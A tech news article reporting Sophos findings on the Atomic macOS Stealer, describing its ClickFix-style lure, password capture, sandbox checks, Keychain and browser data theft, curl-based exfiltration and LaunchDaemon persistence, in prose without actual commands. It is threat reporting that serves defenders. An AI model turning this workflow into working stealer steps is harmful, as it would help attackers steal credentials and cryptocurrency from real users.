- AMOS relies on users executing malicious terminal commands themselves
- Sophos MDR identified ClickFix-style social engineering in macOS attacks
- Half of macOS stealer reports involved AMOS, but Apple is fighting back
Atomic macOS Stealer, also known as AMOS, is a persistent macOS security threat because it does not need sophisticated zero-day vulnerabilities to compromise Apple devices.
Instead, this malware family repeatedly exploits ordinary user behaviour by tricking users into typing a single command into their own Terminal application.
A recent incident investigated by Sophos MDR teams revealed exactly this pattern: a ClickFix-style ruse persuaded a victim to execute a malicious line of code manually.
AMOS uses psychological manipulation over technical exploits
This approach has become increasingly prominent, with researchers noting similar social engineering tactics in multiple macOS infostealer campaigns throughout 2025 and early 2026.
AMOS accounted for nearly 40% of all macOS protection updates deployed by Sophos in 2025, more than doubling the detection rate of any other macOS malware family during the same period.
Furthermore, almost half of all macOS stealer customer reports in the last three months involved AMOS or its close variants.
Security firms have tracked this malware-as-a-service operation since at least April 2023, with notable campaigns including a variant dubbed SHAMOS reported by CrowdStrike in August 2025.
In December 2025, Huntress documented infections spreading through poisoned search results related to ChatGPT and Grok conversations.
How the malware harvests passwords and data
After the initial Terminal command executes a bootstrapping script, the malware immediately prompts the user for their macOS system password.
The malicious code then validates this credential locally using a simple directory services command before storing it in a hidden file named .pass within the user’s home directory.
Once the password is secured, AMOS downloads a secondary payload that removes extended attributes to bypass macOS security warnings.
The stealer also checks whether it is running inside a virtual machine or sandbox environment by querying system_profiler data for indicators such as QEMU, VMware, or KVM.
The malware then proceeds to harvest an extensive range of sensitive information, including the macOS Keychain database, browser credentials from Firefox and Chrome, extension storage files, and local session tokens.
Some variants also deploy fake Ledger Wallet and Trezor Suite applications designed to steal cryptocurrency wallet seeds and credentials.
All collected files are compressed into a single archive using the ditto utility before being transmitted to attacker-controlled servers via curl POST requests.
To maintain long-term access, the malware installs a LaunchDaemon that ensures automatic execution after every system reboot.
Despite the severity of AMOS, it is worth questioning whether security vendors are overstating its novelty, given that infostealers have been targeting Windows systems for nearly two decades.
The malware’s heavy reliance on user consent — someone must willingly paste and run a Terminal command — creates a significant barrier that technically literate users might easily avoid.
Moreover, Apple’s ongoing improvements to Gatekeeper, XProtect, and notarization requirements could render AMOS largely ineffective within a few operating system updates.
The real danger may lie less in AMOS itself and more in the uncomfortable truth that no platform is immune to users who ignore basic security warnings.
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds.
